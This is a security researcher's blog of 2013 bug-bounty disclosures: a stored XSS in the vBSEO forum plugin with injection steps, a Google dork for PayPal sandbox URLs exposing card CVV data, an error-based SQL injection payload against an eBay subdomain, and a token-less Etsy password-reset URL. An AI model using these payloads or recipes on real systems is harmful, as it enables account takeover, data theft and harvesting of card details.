Tuesday, December 24, 2013

Cross Site Scripting ( XSS - Stored ) vulnerability in vBulletin SEO Plugin vBSEO

Posted by Yogesh Jaygadkar  
Tagged as:
11:07 AM

Exploit Title: Cross Site Scripting ( XSS - Stored ) vulnerability in vBulletin SEO Plugin vBSEO.
Found By:  Yogesh Jaygadkar | http://www.jaygadkar.com/
Tested versions: vBSEO 3.2.0 & vBSEO 3.6.0
Tested with: vBulletin 4.0.6 & vBulletin 4.2.1
Vulnerable POST Parameter:  sendtrackbacks

vBSEO Plugin for vBulletin contains a flaw that allows a stored cross-site scripting (XSS) attack. This flaw exists because the application does not validate the 'sendtrackbacks' parameter upon submission to the /forum/newreply.php & /forum/newthread.php script. This may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.


http://www.VictimVBForum.com/forum/newreply.php?do=postreply&t=[Thread ID]

In Advanced Reply Or New Thread page, Put your ">vector in "Trackback"

Submit the Reply. (You can also test it by clicking Preview Post button)

Done  ;)


PayPal : User Credit Card Information Disclosure

Posted by Yogesh  
Tagged as:
10:21 AM

Okay... So, here is another one old & duplicate bug from PayPall, which I reported looooong back.

I have found some strange results of api-3t.sandbox.paypal.com. This sub domain is storing all credit card information of paypal user in URL. Below is the google dork for finding such “stored” CC details.

Google Dork: site:sandbox.paypal.com inurl:CVV2=

Google results are not much, nearly 80, but still harmful as sensitive user information is getting leaked.


Friday, February 22, 2013

Listed in Barracuda Networks Hall of Fame

Posted by Yogesh  
Tagged as:
11:28 PM

Listed in Barracuda Networks Security - Hall of Fame.

Found multiple vulnerabilities in Barracuda security products. Bugs are still not patched.  'll update the POC once all bugs gets patched

Thanks :)


Wednesday, February 20, 2013

Listed in Google Hall Of Fame

Posted by Yogesh  
Tagged as:
11:35 PM

After 2 continues duplicate bugs & 2 Rejections, Google Accepted my 3 bugs... 1 bug is fixed, 2 more in row : D  1st bug did not qualify for a reward so they listed me on their Google Hall of Fame - distinction . But soon I'll be on Reward Recipients page ;)

So, Finally I am listed in Google Hall Of Fame. ‘ll update the POC once all bugs gets patched


Friday, January 25, 2013

SQL Injection Vulnerability in ebay sub domains

Posted by Yogesh  
Tagged as:
10:13 AM

Title: SQL Injection Vulnerability in www.ebay.com sub domains
Author: Yogesh D Jaygadkar
Reported: December 27, 2012
Fixed: Jan 15, 2013
Public Released: Jan 25, 2013
Thanks To: Darshit Ashara

Greets : Rahul Bro, Aasim, Sandeep, Sagar


Last Month I reported SQL Injection vulnerabilities in www.ebay.com sub domains. You can see how many days they took for patching & allowing me to publish the vulnerability. But finally they fixed it & listed me in their Researchers Acknowledgement Page.Like every other bounty hunter I was also searching for some vulnerability in EBAY.That time I have no idea that Ebay don’t give bounty for any vulnerability. Not even for SQL Injection. :)


Vulnerable Parameter:checkbox” Array POST parameter.

Search option in above pages provides a “Select Site” checkboxes which filters the search result by different countries.

HTTP Headers:

Host: sea.ebay.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: Cookie Value
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

POST Contents: checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&

So this is all for submitting report. After that I simply used sqlmap the gr8 :)


Tuesday, January 8, 2013

Password Reset Vulnerability in etsy.com

Posted by Yogesh  
Tagged as:
3:36 AM

TitlePassword Reset Vulnerability in etsy.com
Vuln URL
Author: Yogesh D Jaygadkar
Reported: December 30, 2012
Fixed: December 30, 2012
Public ReleasedJan 08, 2013

In etsy.com, when users reset their password, they receives password reset link which is as below.

https://www.etsy.com/confirm.php?email=[User Email ID]&code=[Token code]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1

When I received this mail, I started playing with this link. I noticed that token is not getting validated from server side. So I removed it & tested with my own id. 

Final POC:
https://www.etsy.com/confirm.php?email=[victim user's email ID]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1
And Password changed successfully.

Finally I am listed in ETSY Thanks Page. & rewarded with $1500 bounty & T-shirt
Thanks to etsy security team for quick reply. 

Thanks to my friends : Darshit, sandeep, rahul bro, aasim , sagar 


What they says

Proudly Powered by Blogger.
back to top